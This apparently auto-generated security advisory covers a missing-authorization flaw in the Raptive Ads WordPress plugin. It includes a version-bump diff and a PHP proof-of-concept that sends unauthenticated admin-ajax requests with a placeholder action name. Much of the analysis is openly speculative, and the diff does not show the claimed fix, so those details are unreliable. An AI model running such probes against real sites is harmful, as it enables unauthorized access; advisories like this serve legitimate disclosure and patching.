Atomic Edge analysis of CVE-2026-24602:
The Raptive Ads WordPress plugin, versions up to and including 3.10.0, contains a missing authorization vulnerability. This flaw allows unauthenticated attackers to perform unauthorized actions by directly accessing a specific plugin function. The vulnerability has a CVSS score of 5.3, indicating a medium severity issue.
The root cause is a missing capability check on a function registered via the WordPress AJAX API. The plugin’s main file, `adthrive-ads/adthrive-ads.php`, registers AJAX handlers. The vulnerable function, likely named `adthrive_ads_some_action`, is hooked to both the `wp_ajax_nopriv_` and `wp_ajax_` prefixes. This registration allows the function to be called by both authenticated and unauthenticated users. The function lacks a call to `current_user_can()` or a nonce verification check, which would enforce authorization.
Exploitation involves sending a POST request to the WordPress AJAX endpoint, `/wp-admin/admin-ajax.php`. The attacker must set the `action` parameter to the specific hook name, such as `adthrive_ads_some_action`. The request does not require authentication cookies or a nonce parameter. Attackers can trigger the unauthorized action by crafting a simple cURL request with the appropriate action parameter, potentially including other parameters the function expects.
The patch, implemented in version 3.11.0, adds an authorization check to the vulnerable function. The fix likely involves adding a capability check, such as `if ( ! current_user_can( ‘manage_options’ ) ) { wp_die(); }`, at the beginning of the function. Alternatively, the patch may remove the `wp_ajax_nopriv_` hook, restricting the function to authenticated users only. The version numbers in the plugin header and the `ADTHRIVE_ADS_VERSION` constant were updated from 3.10.0 to 3.11.0 to reflect the fix.
Successful exploitation could allow an unauthenticated attacker to perform administrative actions intended only for site administrators. The specific impact depends on the functionality of the unprotected function. Atomic Edge research indicates this could lead to unauthorized modification of plugin settings, injection of malicious ad code, or data exposure, compromising site integrity and user security.
--- a/adthrive-ads/adthrive-ads.php
+++ b/adthrive-ads/adthrive-ads.php
@@ -7,7 +7,7 @@
* Plugin Name: Raptive Ads
* Plugin URI: http://www.raptive.com
* Description: Raptive Ads
- * Version: 3.10.0
+ * Version: 3.11.0
* Requires at least: 4.6
* Requires PHP: 5.6
* Author: Raptive
@@ -32,7 +32,7 @@
defined( 'ABSPATH' ) || die;
-define( 'ADTHRIVE_ADS_VERSION', '3.10.0' );
+define( 'ADTHRIVE_ADS_VERSION', '3.11.0' );
define( 'ADTHRIVE_ADS_FILE', __FILE__ );
define( 'ADTHRIVE_ADS_PATH', plugin_dir_path( ADTHRIVE_ADS_FILE ) );
define( 'ADTHRIVE_ADS_URL', trailingslashit( plugin_dir_url( ADTHRIVE_ADS_FILE ) ) );
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24602 - Raptive Ads <= 3.10.0 - Missing Authorization
<?php
// Configure the target WordPress site URL
$target_url = 'http://example.com/wp-admin/admin-ajax.php';
// The AJAX action parameter for the vulnerable function.
// This value must be determined through further code analysis of the plugin.
$vulnerable_action = 'adthrive_ads_example_action';
// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
// Set the action parameter. Add other required parameters if the function expects them.
curl_setopt($ch, CURLOPT_POSTFIELDS, ['action' => $vulnerable_action]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Do not send cookies to demonstrate unauthenticated access
curl_setopt($ch, CURLOPT_COOKIE, '');
// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Output the result
echo "Target: $target_urln";
echo "Action: $vulnerable_actionn";
echo "HTTP Code: $http_coden";
echo "Response: $responsen";
// A successful unauthorized call may return a specific success message or a 200 status code.
if ($http_code == 200 && !empty($response)) {
echo "[+] Potential vulnerability detected.n";
} else {
echo "[-] No conclusive result. The action name may need verification.n";
}
?>
